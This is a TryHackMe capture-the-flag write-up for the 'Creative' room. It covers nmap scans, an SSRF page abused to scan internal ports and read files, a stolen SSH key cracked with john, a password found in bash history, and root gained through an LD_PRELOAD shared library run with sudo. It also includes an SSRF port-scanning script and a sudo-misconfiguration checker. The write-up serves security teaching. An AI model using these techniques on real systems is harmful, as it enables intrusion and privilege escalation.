The following post by anthonyjsaab is licensed under
0 - Introduction
Link to room:
This writeup walks you through a room on TryHackMe created by tryhackme and ssaadakhtarr
1 - Scanning
1a - Nmap
1ai - Port Discovery
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap 10.10.194.114 -sS -T5 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:11 EEST
Nmap scan report for 10.10.194.114
Host is up (0.11s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 130.06 seconds
1aii - Versioning
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sC -sV -p22,80 10.10.194.114
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:16 EEST
Nmap scan report for 10.10.194.114
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
| 256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
|_ 256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://creative.thm
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds
1aiii - Checking for vulnerabilities
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV --script vulners 10.10.194.114
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:18 EEST
Nmap scan report for 10.10.194.114
Host is up (0.099s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2012-1577 7.5 https://vulners.com/cve/CVE-2012-1577
| PRION:CVE-2020-15778 6.8 https://vulners.com/prion/PRION:CVE-2020-15778
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| PRION:CVE-2020-12062 5.0 https://vulners.com/prion/PRION:CVE-2020-12062
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2010-4816 5.0 https://vulners.com/cve/CVE-2010-4816
| PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| PRION:CVE-2021-41617 4.4 https://vulners.com/prion/PRION:CVE-2021-41617
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145
| PRION:CVE-2016-20012 4.3 https://vulners.com/prion/PRION:CVE-2016-20012
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
| CVE-2023-51767 3.5 https://vulners.com/cve/CVE-2023-51767
| PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds
1aiv - OS Fingerprinting
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -O 10.10.194.114
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:20 EEST
Nmap scan report for 10.10.194.114
Host is up (0.096s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|storage-misc
Running (JUST GUESSING): Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
Aggressive OS guesses: Crestron XPanel control system (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds
1b - Directory busting
1bi - Fixing /etc/hosts
Before executing a directory busting scan, we have to check if we can access the supposed website on the target machine normally. When we try, we find that the webserver returns this:
┌──(kali㉿kali)-[~/Desktop]
└─$ curl http://10.10.194.114 -vvv
* Trying 10.10.194.114:80...
* Connected to 10.10.194.114 (10.10.194.114) port 80
> GET / HTTP/1.1
> Host: 10.10.194.114
> User-Agent: curl/8.5.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.18.0 (Ubuntu)
< Date: Mon, 22 Apr 2024 07:11:40 GMT
< Content-Type: text/html
< Content-Length: 178
< Connection: keep-alive
< Location: http://creative.thm
<
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
* Connection #0 to host 10.10.194.114 left intact
Thus, we add a hosts entry so that the redirect target resolves to the machine:
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "10.10.194.114\tcreative.thm" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.194.114 creative.thm
┌──(kali㉿kali)-[~/Desktop]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.194.114 creative.thm
The target machine exposes two ports: 22 (SSH, OpenSSH 8.2p1 on Ubuntu) and 80 (HTTP, nginx 1.18.0, which redirects to creative.thm).
The CVEs returned by vulners are matched on the version banner alone; none of them is confirmed or used in this writeup, so they are noise for this box. The -O guesses (Crestron, HP) are unreliable too, as nmap itself warns, and the SSH banner already tells us the host runs Ubuntu.
Subdomain (vhost) enumeration against creative.thm returned one interesting vhost to check out: beta.creative.thm.
2 - beta.creative.thm
2a - First contact
This webpage is very interesting. I spin up an HTTP server on my Kali machine to see what it really does:
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "10.10.4.16\tbeta.creative.thm" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.4.16 beta.creative.thm
┌──(kali㉿kali)-[~/Desktop]
└─$ mkdir testdir && cd testdir && python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.4.16 - - [22/Apr/2024 15:44:38] "GET / HTTP/1.1" 200 -
Thus, the target fetches whatever URL it is given and relays the response back to us: it behaves like a forward proxy, which is to say the page is a server-side request forgery (SSRF) primitive.
2b - Python worker
Let us examine the behaviour of this page further. Submitting a URL to a nonexistent file gives us the following:
From the User-Agent shown above, and from the difference in beta's behaviour when given a good or a bad URL, it seems that beta launches a Python worker to download the requested resource and then sends it back to us. When the worker receives a 404, it appears to crash or terminate without relaying a body.
2c - Internal Nmap and Proxy (kinda)
When we submit http://localhost or http://127.0.0.1 in beta, it correctly returns the creative.thm webpage. However, http://localhost:22 will return "Dead".
This means beta can tell us whether a port bound to 127.0.0.1 on the target is open, provided the service behind it speaks HTTP. In effect, beta is an nmap for local HTTP servers, and the scan originates from the target machine rather than from our IP address.
For the scan, I generated a list of all 65535 possible TCP ports. Then, using a sample request-response pair captured from beta.creative.thm, I crafted a gobuster command that talks correctly to the endpoint. It sends 65535 requests to the same endpoint that differ only by the port number in the request body. A response of length 13 means the server returned "Dead", so that case is excluded.
As we can see, we found that an HTTP server is bound to 127.0.0.1:1337 of the target machine.
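The same scan in script form, as an added example rather than the gobuster command used in the writeup. It assumes the fetcher is reached with a POST to http://beta.creative.thm/ and that the form field carrying the URL is named `url`; neither is stated on the page, so treat both as hypothetical. Only the "Dead" marker and its 13-byte response length come from the writeup. The transport is injectable, so the scan logic runs offline against a constructed stand-in (ports 80 and 1337 "speak HTTP", everything else is closed) and can be pointed at the real box by swapping in `live_fetch`.

```python
import urllib.parse
import urllib.request

# Assumptions, not taken from the page: the endpoint and the form field name.
ENDPOINT = "http://beta.creative.thm/"
FIELD = "url"
DEAD_LENGTH = 13  # the writeup observed a 13-byte body for the "Dead" reply


def classify(body):
    """Map a relayed response body to a verdict on the probed port.

    None means our own request failed (timeout, connection error).  The
    13-byte "Dead" body means the worker could not fetch the URL, which for
    a 127.0.0.1 target means the port is closed or does not speak HTTP.
    """
    if body is None:
        return "error"
    if len(body) == DEAD_LENGTH and b"Dead" in body:
        return "closed"
    return "http"


def scan_ports(ports, fetch):
    """Probe each port through the SSRF; return the ones that relayed content.

    `fetch(url)` returns the bytes the fetcher relayed, or None on error.
    """
    found = []
    for port in ports:
        if classify(fetch(f"http://127.0.0.1:{port}/")) == "http":
            found.append(port)
    return found


def live_fetch(target_url, timeout=10):
    """Real transport against the target (needs the VPN and the hosts entry)."""
    data = urllib.parse.urlencode({FIELD: target_url}).encode()
    try:
        with urllib.request.urlopen(ENDPOINT, data=data, timeout=timeout) as resp:
            return resp.read()
    except OSError:  # URLError and socket timeouts are both OSError subclasses
        return None


def fake_fetch(target_url):
    """Constructed stand-in for the target: 80 and 1337 answer, the rest are closed."""
    port = urllib.parse.urlsplit(target_url).port
    if port in (80, 1337):
        return b"<html><body>Directory listing for /</body></html>"
    return b"Dead".ljust(DEAD_LENGTH)  # 13 bytes, like the real "Dead" page


if __name__ == "__main__":
    # Offline demo; replace fake_fetch with live_fetch for the real box.
    print(scan_ports(range(1, 65536), fake_fetch))
```

Classifying on the exact "Dead" body rather than on length alone avoids false positives if some other error page happens to be 13 bytes long; a port that times out on the worker's side still needs to be inspected by hand, since the page only documents the closed and the HTTP cases.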
When we request this page via our forward proxy (aka beta.creative.thm), we get this:
Voila! The HTTP server at 127.0.0.1:1337 returns a directory listing at the root of the filesystem! This is cool. However, each time we want to access a file or change directory, we need to go back to beta's landing page and submit the new path. It is not quite like a shell.
Unfortunately, we cannot access /root/ just yet. However, we can access /home/, where we see this:
We have our first flag: user.txt is there and readable. Now, to get a proper shell so we can move on to privilege escalation, we go into .ssh and retrieve the private key (id_rsa) of the saad user.
3 - Foothold using saad account
3a - Trying to login
Using the above SSH private key, we can try to log in to the target machine:
We have a small problem. We do not know the SSH key's passphrase. We have to crack it.
3b - Cracking the passphrase
┌──(kali㉿kali)-[~/Downloads]
└─$ ssh2john id_rsa > saad.hash
┌──(kali㉿kali)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/seclists/Passwords/probable-v2-top12000.txt saad.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sweetness (id_rsa)
1g 0:00:00:29 DONE (2024-05-04 11:23) 0.03444g/s 82.67p/s 82.67c/s 82.67C/s alexia..grateful
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Sweet! We cracked the passphrase.
3c - Foothold
┌──(kali㉿kali)-[~/Downloads]
└─$ ssh -i ./id_rsa saad@creative.thm
Enter passphrase for key './id_rsa':
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 04 May 2024 08:25:43 AM UTC
System load: 0.0 Processes: 115
Usage of /: 57.3% of 8.02GB Users logged in: 0
Memory usage: 26% IPv4 address for eth0: 10.10.2.249
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
58 updates can be applied immediately.
33 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Nov 6 07:56:40 2023 from 192.168.8.102
saad@m4lware:~$ ls -la
total 52
drwxr-xr-x 7 saad saad 4096 Jan 21 2023 .
drwxr-xr-x 3 root root 4096 Jan 20 2023 ..
-rw------- 1 saad saad 362 Jan 21 2023 .bash_history
-rw-r--r-- 1 saad saad 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 saad saad 3797 Jan 21 2023 .bashrc
drwx------ 2 saad saad 4096 Jan 20 2023 .cache
drwx------ 3 saad saad 4096 Jan 20 2023 .gnupg
drwxrwxr-x 3 saad saad 4096 Jan 20 2023 .local
-rw-r--r-- 1 saad saad 807 Feb 25 2020 .profile
drwx------ 3 saad saad 4096 Jan 20 2023 snap
drwx------ 2 saad saad 4096 Jan 21 2023 .ssh
-rwxr-xr-x 1 root root 150 Jan 20 2023 start_server.py
-rw-r--r-- 1 saad saad 0 Jan 20 2023 .sudo_as_admin_successful
-rw-rw---- 1 saad saad 33 Jan 21 2023 user.txt
saad@m4lware:~$
4 - PrivEsc
First of all, the password of the saad account is sitting in the bash history (beware that the line was typed inside double quotes, where a shell expands `$4`, so what actually landed in creds.txt may have differed from what was typed; if one form is refused, try the other):
saad@m4lware:~$ head .bash_history
whoami
pwd
ls -al
ls
cd ..
sudo -l
echo "saad:MyStrongestPasswordYet$4291" > creds.txt
rm creds.txt
sudo -l
whomai
We can now proceed with some classical manual enumeration commands:
saad@m4lware:~$ sudo -l
[sudo] password for saad:
Matching Defaults entries for saad on m4lware:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
env_keep+=LD_PRELOAD
User saad may run the following commands on m4lware:
(root) /usr/bin/ping
saad@m4lware:~$
Running ping as root is useless by itself. However, sudo keeps the caller's LD_PRELOAD (env_keep+=LD_PRELOAD), so the dynamic loader will map any library we name into the root-owned ping process before its main() runs. The loader normally ignores LD_PRELOAD for set-uid programs, but here the child is started by sudo with real and effective UID 0, so that protection does not apply and we effectively run anything as root. The library must be given with a path containing a slash: a bare "shell.so" is looked up in the library search directories, not in the current directory, which is why the first attempt below is ignored by ld.so.
saad@m4lware:~$ cat shared_bash.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* declares setgid/setuid; without it gcc warns about implicit declarations */

/* _init runs when the loader maps this object, i.e. before ping's main(). */
void _init() {
    unsetenv("LD_PRELOAD");   /* do not re-inject ourselves into the shell we spawn */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
saad@m4lware:~$ gcc -fPIC -shared -o shell.so shared_bash.c -nostartfiles
(The original build printed "implicit declaration of function ‘setgid’/‘setuid’" warnings because <unistd.h> was missing; with the include above the compile is silent. Either way the resulting shell.so works.)
saad@m4lware:~$ sudo LD_PRELOAD=shell.so ping
ERROR: ld.so: object 'shell.so' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
ping: usage error: Destination address required
saad@m4lware:~$ sudo LD_PRELOAD=/home/saad/shell.so ping
root@m4lware:/home/saad# whoami
root
root@m4lware:/home/saad# ls /root
root.txt snap
root@m4lware:/home/saad#
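A check for the misconfiguration that made this escalation possible, as an added example that is not part of the writeup: it parses `sudo -l` output, lists the loader variables sudo keeps from the caller's environment, lists the commands runnable as root, and flags the combination. The sample input is a constructed copy of the `sudo -l` output shown above; the parsing regex is my own and assumes sudo's usual "(runas) [TAGS:] command" layout.

```python
import re

# Constructed sample: the sudo -l output from this box, reproduced as input.
SAMPLE_SUDO_L = """\
Matching Defaults entries for saad on m4lware:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin,
    env_keep+=LD_PRELOAD

User saad may run the following commands on m4lware:
    (root) /usr/bin/ping
"""

# Variables that let the caller load code into any dynamically linked program.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH"}

# "(root) NOPASSWD: /usr/bin/ping" -> runas, optional tags, command
_SPEC = re.compile(r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)")


def parse_sudo_l(text):
    """Split sudo -l output into the Defaults it reports and the command specs."""
    defaults, commands = [], []
    in_commands = False
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("Matching Defaults"):
            continue
        if stripped.startswith("User ") and "may run" in stripped:
            in_commands = True
            continue
        if in_commands:
            m = _SPEC.match(stripped)
            if m:
                commands.append({
                    "runas": m.group("runas"),
                    "nopasswd": "NOPASSWD:" in m.group("tags"),
                    "cmd": m.group("cmd").strip(),
                })
        else:  # Defaults lines are comma-separated and may wrap
            defaults.extend(d.strip() for d in stripped.rstrip(",").split(",") if d.strip())
    return defaults, commands


def kept_loader_vars(defaults):
    """Return the loader variables that env_keep preserves from the caller."""
    kept = set()
    for d in defaults:
        m = re.match(r'env_keep\s*\+?=\s*"?([^"]+)"?', d)
        if m:
            kept.update(v for v in m.group(1).split() if v in LOADER_VARS)
    return kept


def assess(text):
    """Flag sudo rules where a kept loader variable meets a command run as root."""
    defaults, commands = parse_sudo_l(text)
    kept = kept_loader_vars(defaults)
    root_cmds = [c for c in commands if "root" in c["runas"] or "ALL" in c["runas"]]
    return {
        "kept_loader_vars": sorted(kept),
        "root_commands": [c["cmd"] for c in root_cmds],
        "ld_preload_privesc": bool(kept) and bool(root_cmds),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_SUDO_L))
```

The fix on the defender's side is simply to drop `env_keep+=LD_PRELOAD` (and never add LD_LIBRARY_PATH) from sudoers; a restricted command list such as `(root) /usr/bin/ping` does nothing while the loader is allowed to pull in arbitrary code first.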
(Note for section 2a: the request log there was triggered by manually entering a URL pointing at my Kali HTTP server in beta.creative.thm's input field and submitting it; the browser then displayed what my python -m http.server answered.)